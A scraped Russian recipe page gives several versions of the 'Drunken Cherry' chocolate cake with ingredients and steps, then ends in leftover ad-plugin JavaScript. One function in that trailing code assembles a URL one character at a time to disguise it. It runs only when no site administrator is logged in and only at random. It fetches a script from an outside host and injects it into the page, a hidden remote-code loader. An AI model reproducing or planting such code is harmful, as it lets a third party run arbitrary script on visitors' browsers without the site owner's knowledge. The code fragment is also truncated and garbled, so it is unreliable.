Торт Пьяная вишня

Торт пьяная вишня

Нежный шоколадный бисквит, сочная ароматная вишня, сладкий крем с ноткой терпкого алкоголя. Этот десерт сводит с ума многих людей на протяжении десятилетий. Торт «Пьяная вишня» можно смело назвать классикой кондитерского искусства. Его к особо торжественным случаям пекли наши бабушки, мамы, а теперь мы готовим его для своих родных и друзей. Если вам хочется чего-то особенного, вкусного и необычного – испеките этот удивительный торт, следуя нашему пошаговому рецепту.

Ингредиенты

Мука 250 г

  • Яйца куриные 6 шт.
  • Какао 4 ст.л.
  • Сахар 350 г
  • Разрыхлитель 1,5 ч.л.
  • Крем:

    Сгущённое молоко 1 банка

  • Сливочное масло 300 г
  • Для торта:

    Вишня 2 стакана

  • Красное вино
  • Шоколад для украшения

Торт пьяная вишня видео-рецепт

Торт пьяная вишня пошаговый фото-рецепт

Из свежей или размороженной вишни удаляем косточки, и заливаем красным полусладким вином. Оставляем минимум на 2 часа.

Готовим шоколадный бисквит. Отделяем белки от желтков, и взбиваем их в пышную массу, постепенно добавляя сахар.

Затем, продолжая взбивать, по одному вводим желтки.

Добавляем в муку разрыхлитель и какао. Перемешиваем, и добавляем к яичной массе.

Аккуратно перемешиваем до однородности.

Выкладываем тесто в форму, дно которой выстелено пергаментом.

Выпекаем в разогретой до 180*С духовке приблизительно 35 минут (до сухой зубочистки).

С остывшего бисквита срезаем верхушку.

Из нижней части бисквита аккуратно выбираем всю мякоть, оставляя бортик толщиной 1,5 см.

Готовим масляный крем. Мягкое сливочное масло взбиваем миксером 3-4 минуты со сгущённым молоком.

Третью часть крема нужно отложить для украшения торта.

В остальной крем выкладываем бисквитный мякиш, немного оставив для обсыпки торта.

А так же отцеженную вишню.

Аккуратно перемешиваем начинку.

Дно бисквита пропитываем жидкостью, оставшейся после отцеживания вишни.

Внутрь бисквита выкладываем начинку.

Пропитываем верхушку, и накрываем ею бисквит.

Смазываем бока и верх торта кремом.

Обсыпаем бока торта бисквитной крошкой. Украшаем кремом, вишнями и рубленным шоколадом. Нарезаем на порционные куски, и подаём к столу. Приятного аппетита!

Торт “Пьяная вишня”

Сырные трубочки с майонезом ТМ #Махеевъ

Закуска “Морская” с майонезом ТМ #Махеевъ

Закуска из кураги с майонезом ТМ #Махеевъ

Салат Вальдорф с майонезом ТМ #Махеевъ

Закуска с сельдью и майонезом ТМ #Махеевъ

Шоколадный торт с приятной кислинкой сочны ягод вишни.

Ингредиенты

Вишня в сиропе
вишня 0,5 л
сахар для вишни 5 ст.л.
коньяк 5 ст.л.
Бисквит
яйцо куриное 2 шт
сахар 350 г
мука пшеничная 400 г
растительное масло 100 мл
разрыхлитель теста 20 г
сода 1 ч.л.
какао-порошок 5 ст.л.
молоко 200 мл
вода (крутой кипяток) 300 мл
Крем
масло сливочное размягченное 150 г
молоко 300 мл
яйцо куриное 1 шт
сахар 5 ст.л.
мука пшеничная 3 ст.л.
ванилин 0,5 г
Для украшения
орехи грецкие 1 горсть

Общая информация

Сложность

Средний

Пошаговый рецепт с фото

Вишню помыть, обсушить, удалить косточки. Готовые ягоды смешать с сахаром и коньяком, оставить для пропитки на 10-12 часов.

Для бисквита смешать муку, соду, разрыхлитель, сахар и какао-порошок.

В отдельной посуде взбить яйца, молоко и растительное масло

Соединить сухую и жидкую смеси, хорошо перемешать миксером.

Вскипятить воду и влить крутой кипяток в тесто тщательно перемешивая его.

Вылить тесто в форму и поставить в духовку, разогретую до 180 градусов, примерно на 1 час. Готовность бисквита проверить сухой лучинкой.

Для крема смешать половину нормы молока (150 мл) с сахаром, яйцом и мукой. Тщательно размешать, чтобы не было комочков.

Оставшиеся 150 мл молока довести до кипения, влить тонкой струйкой в яично-молочно-мучную смесь хорошо перемешивая. Поставить крем на медленный огонь и варить, постоянно помешивая, до загустения.

Готовый крем снять с огня, закрыть вконтакт пищевой пленкой и убрать до полного остывания.

Размягченное сливочное масло взбить с ванилином до побеления. Остывший заварной крем по одной столовой ложке добавлять в масло продолжая взбивать. Должен получиться пышный, воздушный крем.

Готовый бисквит остудить.

Срезать верхушку, вынуть середину бисквита, оставив по краям и на дне примерно по 2-2,5 см. измельчить верхушку и мякоть в крошку.

Слить сироп от вишни и пропитать им основу торта.

Оставить часть крема для обмазки боков торта, остальное смешать с ягодами вишни.

Получившейся начинкой плотно заполнить основу торта.

Оставшейся частью крема обмазать бока торта.

Обсыпать торт бисквитной крошкой, украсить толченным грецким орехом. Поставить на холод на 2-3 часа для пропитки и застывания крема. Приятного аппетита!

Торт “пьяная вишня”

Ингредиенты

  • пьяная вишня:
  • вишня замороженная 3 ст.
  • коньяк 2/3 ст.
  • бисквит:
  • куриные яйца 3 шт
  • сахар 450 г
  • мука пшеничная 500 г
  • молоко коровье 300 мл.
  • растительное масло 150 мл.
  • кипяток крутой 300 мл.
  • какао-порошок 12 ст.л.
  • разрыхлитель 2 ½ ч.л.
  • сода 2 ½ ч.л.
  • крем сливочный:
  • сливочное масло 250 г
  • сгущеное молоко 400 г
  • какао 3 ст.л.
  • коньяк из-под вишни 4 ст.л.
  • шоколадная глазурь:
  • шоколад горький (70%) 100 г
  • сливочное масло 50 г
  • сахарная пудра 4 ст.л.
  • какао 2 ст.л.
  • крахмал картофельный 1 ст.л.
  • коньяк их-под вишни 4 ст.л.

Пошаговый рецепт приготовления

Размороженные вишни поместить в контейнер, залить коньяком и оставить настаиваться при комнатной температуре на 1-2 суток.

Корж тоже можно испечь заранее, например, с вечера, чтобы он успел хорошо остыть. Сначала нужно соединить сухие ингредиенты. Для этого просеять в большую чашу муку, всыпать сахар, соду, разрыхлитель и какао, перемешать хорошенько.

В другой чаше соединить яйца, которые необходимо сначала взбить, влить растительное масло и молоко, хорошо размешать.

Сухие и жидкие ингредиенты соединить друг с другом, вымесить достаточно вязкое тесто.

В тесто влить крутой кипяток и очень быстро размешать тесто. Получится тесто консистенции густой сметаны.

Застелить дно формы для выпечки пергаментной бумагой. У меня была форма диаметром 20 см, разъемная. Смазывать нет необходимости. Для того чтобы бисквит сильно не округлился, иначе серединка может порваться, нужно мокрое полотенце завернуть в фольгу и обернуть этим форму вокруг с внешней стороны. В форму вылить тесто. Внимание. Из данного количества ингредиентов у меня получилось 2 торта диаметром 20 см. Поэтому тесто нужно разделить пополам или испечь корж в форме большего диаметра.

Выпекать бисквит нужно при температуре 190 градусов 1 ч 20 мин – 1 ч 30 мин. Проверить готовность на сухую зубочистку, если она окажется влажной, то выпекать еще немного, затем снова проверить.

Теперь из бисквитного коржа нужно сделать полую коробочку, сначала нужно срезать верхушку и отложить ее в сторону. Вынуть мякиш ложкой или просто руками, оставляя стенки и дно толщиной не менее 1 см.

Вынутый мякиш покрошить в крошку или нарезать на небольшие кусочки.

Вишню откинуть на дуршлаг стечь. Жидкость должна остаться, она нам еще понадобится для приготовления крема. Сгущеное молоко вылить в миску и смешать с 4 ст.л. коньяка из-под вишен. Добавить сами вишни и все перемешать.

Сливочное масло должно быть комнатной температуры. Взбить его при помощи миксера в воздушную массу.

Добавить масло к вишневой сгущенке. Хорошо перемешать. Всыпать какао и снова перемешать.

Разделить получившийся крем на 2 части. В одну добавить крошки или кусочки вынутого бисквита, все хорошо перемешать. Крем готов. 2 часть крема останется для второго торта.

Полый корж промочить коньяком из-под вишен.

Выложить крем и хорошо разровнять. Накрыть крышкой от бисквита.

Приготовить глазурь. Для этого на водяной бане необходимо растопить сливочное масло и добавить сахарную пудру. Хорошо перемешать чтобы не было комочков.

Добавить коньяк и какао, снова перемешать. Всыпать крахмал и не прерывно помешивая выложить шоколад, поломанный на кусочки, довести до растворения шоколада. Снять с плиты. Дать чуть-чуть остыть.

Залить торт глазурью и разровнять при помощи лопатки. Такое количество глазури идет на 1 торт, на другой нужно будет сделать еще одну порцию.

Дать глазури застыть. Она отлично застывает и не липнет к рукам. Отправить торт на ночь в холодильник, чтобы он успел хорошо пропитаться и стать еще вкуснее. Приятного чаепития!

Торт «Пьяная вишня» (классический)

Ингредиенты

Яйца куриные – 6 шт.

Мука пшеничная – 100 г

Крахмал кукурузный – 1,5 ст.л.

Разрыхлитель – 0,5 ч.л.

Для крема:

Масло сливочное – 300 г

Молоко сгущенное – 400 г

Вишня – 2 стакана

Вино красное сладкое – 1/2 стакана

Глазурь шоколадная:

Горький шоколад – 75 г

Масло сливочное – 60 г

  • 319 кКал
  • 2 ч.
  • 2 ч.

Фото готового блюда

Пошаговый рецепт с фото

Название торта «Пьяная вишня» говорит само за себя – это вкусный шоколадный торт с вишней, пропитанной крепким алкоголем, покрытый сверху глазурью на основе горького шоколада. Что может быть лучше классического сочетания шоколада и вишни? Пожалуй, ничего! Конечно, такой десерт – это лакомство только для взрослых, ведь алкоголь детям ни в коем случае нельзя, правда, если вишню не пропитывать в алкоголе, тогда другое дело. Но так как мы говорим о классическом торте, то печем его именно таким, как положено.

Появился этот торт в советское время в ответ на популярный немецкий торт «Шварцвальдский», или как его еще называют – «Черный лес». Но не будем путать друг с другом эти торты, ведь они совершенно отличаются не только по составу, но и по сборке. Единственное, что их объединяет, так это то, что они шоколадные.

Классический торт «Пьяная вишня» не состоит из нескольких коржей, как другие торты, для него выпекается всего один корж, но большой. Срезается с коржа верхняя тонкая часть, из нижней части вынимается внутренняя часть, чтобы получилась заготовка в виде глубокой чаши, которая после будет наполнена вишней, настоянной на алкоголе, смешанной с кремом на сгущенном молоке. Затем все это закрывается бисквитной крышкой и заливается шоколадной глазурью. Вот так вкратце можно описать классическую версию этого вкусного торта, а теперь можно приступить к практической части, для чего возьмем необходимые ингредиенты.

Если берете замороженную вишню, как я, то ей нужно дать разморозиться, затем удаляем косточки и заливаем алкоголем. Можно использовать коньяк или крепкое красное вино. Оставляем на ночь.

На следующий день приступаем к выпечке бисквита для торта. Смешаем просеянную муку, разрыхлитель и какао.

Белки взбиваем в крепкую пену, всыпаем половину сахара и взбиваем дальше до гладкости.

В другой емкости взбиваем куриные желтки с оставшимся сахаром до пышности.

Во взбитые желтки всыпаем половину мучной смеси и перемешиваем лопаткой.

Затем аккуратно добавляем взбитые белки и смешиваем лопаткой до объединения всей массы.

После добавляем остальную муку и смешиваем. Тесто готово.

Выливаем тесто в форму, дно которой застелем пергаментом. Ставим форму с тестом в духовку и печем бисквит примерно 40 минут при 180 градусах. Духовку разогреем заранее.

Готовый бисквит достаем и даем остыть в форме, перевернув его вверх дном.

У остывшего бисквита срежем верхушку и аккуратно вырежем внутреннюю часть, которую измельчим в крошку, это можно сделать в блендере. Должна получиться вот такая чаша из бисквита.

Теперь сделаем крем. Взбиваем сливочное масло комнатной температуры до пышности и посветления. Затем будем добавлять по две ложки сгущенки и продолжать взбивать после каждого добавления до однородности.

Отложим 3 ложки крема для украшения торта, а в основной крем добавим бисквитную крошку и процеженную от алкоголя вишню. Смешаем.

Выложим крем с вишней в бисквитную чашу и утрамбуем плотно.

Для шоколадной глазури растопим шоколад вместе с маслом, периодически помешивая.

Поливаем торт шоколадной глазурью.

В самом конце украшаем торт произвольно отложенным кремом с помощью насадок. Сверху на крем поместим по вишенке.

Классический торт «Пьяная вишня» готов! Испеките его к любому празднику и ваши домашние будут в восторге, поверьте. А у меня для фото разреза остались только лишь два кусочка.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),c=ff(window),b=ff("body"),g=void 0===flatPM_getCookie("flat_modal_"+a.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+a.ID+"_mb"),i="scroll.flatmodal"+a.ID,m="mouseleave.flatmodal"+a.ID+" blur.flatmodal"+a.ID,l=function(){var t,e,o;void 0!==a.how.popup.timer&&"true"==a.how.popup.timer&&(t=ff('.fpm_5_modal[data-id-modal="'+a.ID+'"] .fpm_5_timer span'),e=parseInt(a.how.popup.timer_count),o=setInterval(function(){t.text(--e),e'))},1e3))},s=function(){void 0!==a.how.popup.cookie&&"false"==a.how.popup.cookie&&g&&(flatPM_setCookie("flat_modal_"+a.ID+"_mb",!1),ff('.fpm_5_modal[data-id-modal="'+a.ID+'"]').addClass("fpm_5_modal-show"),l()),void 0!==a.how.popup.cookie&&"false"==a.how.popup.cookie||(ff('.fpm_5_modal[data-id-modal="'+a.ID+'"]').addClass("fpm_5_modal-show"),l())},ff("body > *").eq(0).before('
'+p+"
"),w=document.querySelector('.fpm_5_modal[data-id-modal="'+a.ID+'"] .fpm_5_modal-content'),flatPM_setHTML(w,e),"px"==a.how.popup.px_s?(c.bind(i,function(){c.scrollTop()>a.how.popup.after&&(c.unbind(i),b.unbind(m),s())}),void 0!==a.how.popup.close_window&&"true"==a.how.popup.close_window&&b.bind(m,function(){c.unbind(i),b.unbind(m),s()})):(v=setTimeout(function(){b.unbind(m),s()},1e3*a.how.popup.after),void 0!==a.how.popup.close_window&&"true"==a.how.popup.close_window&&b.bind(m,function(){clearTimeout(v),b.unbind(m),s()}))),void 0!==a.how.outgoing){function n(){var t,e,o;void 0!==a.how.outgoing.timer&&"true"==a.how.outgoing.timer&&(t=ff('.fpm_5_out[data-id-out="'+a.ID+'"] .fpm_5_timer span'),e=parseInt(a.how.outgoing.timer_count),o=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==a.how.outgoing.cookie&&"false"==a.how.outgoing.cookie&&g&&(ff('.fpm_5_out[data-id-out="'+a.ID+'"]').addClass("show"),n(),b.on("click",'.fpm_5_out[data-id-out="'+a.ID+'"] .fpm_5_cross',function(){flatPM_setCookie("flat_out_"+a.ID+"_mb",!1)})),void 0!==a.how.outgoing.cookie&&"false"==a.how.outgoing.cookie||(ff('.fpm_5_out[data-id-out="'+a.ID+'"]').addClass("show"),n())}var _,u="0"!=a.how.outgoing.indent?' style="bottom:'+a.how.outgoing.indent+'px"':"",p="true"==a.how.outgoing.cross?void 0!==a.how.outgoing.timer&&"true"==a.how.outgoing.timer?'
Закрыть через '+a.how.outgoing.timer_count+"
":'':"",c=ff(window),h="scroll.out"+a.ID,m="mouseleave.outgoing"+a.ID+" blur.outgoing"+a.ID,g=void 0===flatPM_getCookie("flat_out_"+a.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+a.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(a.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+p+"
");var v,w=document.querySelector('.fpm_5_out[data-id-out="'+a.ID+'"]');flatPM_setHTML(w,e),"px"==a.how.outgoing.px_s?(c.bind(h,function(){c.scrollTop()>a.how.outgoing.after&&(c.unbind(h),b.unbind(m),d())}),void 0!==a.how.outgoing.close_window&&"true"==a.how.outgoing.close_window&&b.bind(m,function(){c.unbind(h),b.unbind(m),d()})):(v=setTimeout(function(){b.unbind(m),d()},1e3*a.how.outgoing.after),void 0!==a.how.outgoing.close_window&&"true"==a.how.outgoing.close_window&&b.bind(m,function(){clearTimeout(v),b.unbind(m),d()}))}}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==o.chapter_sub&&o.chapter_subflat_userVars.titlelen||void 0!==o.title_sub&&o.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,o=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,o)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var a=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;a');t=t.parent()[0];flatPM_sticky(this,t,o)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".fpm_5_out .fpm_5_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".fpm_5_modal .fpm_5_cross",function(){ff(this).closest(".fpm_5_modal").removeClass("fpm_5_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),ff("[data-flat-id]:not(.fpm_5_out):not(.fpm_5_modal)").contents().unwrap(),flatPM_ping()};var parseHTML=function(){var l=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,r,n,o=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=o.appendChild(t.createElement("div")),r=(d.exec(e)||["",""])[1].toLowerCase(),r=c[r]||c._default,a.innerHTML=r[1]+e.replace(l,"$2>")+r[2],n=r[0];n--;)a=a.lastChild;for(o.removeChild(o.firstChild);a.firstChild;)o.appendChild(a.firstChild)}else o.appendChild(t.createTextNode(e));return o}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,166);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"r"+"e"+"a"+"d"+"o"+"n"+"e"+"."+"r"+"u"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,r=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)r.appendChild(a),ff(r).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var o=jQuery,t=e.selector,l=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",r=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,n='
'+a+" через "+l+'
'+r+'
',i=e.once;o(t).each(function(){var e=o(this);e.wrap('
');var t=e.closest(".fpm_5_video");flatPM_setHTML(t[0],n),e.find(".fpm_5_video_flex").one("click",function(){o(this).addClass("show")})}),o("body").on("click",".fpm_5_video_item_hover",function(){var e=o(this),t=e.closest(".fpm_5_video_flex");t.addClass("show");var a=t.find(".fpm_5_timer span"),r=parseInt(l),n=setInterval(function(){a.text(--r),r'):t.remove())},1e3);e.remove()}).on("click",".fpm_5_video_flex .fpm_5_cross",function(){o(this).closest(".fpm_5_video_flex").remove(),"true"==i&&o(".fpm_5_video_flex").remove()})};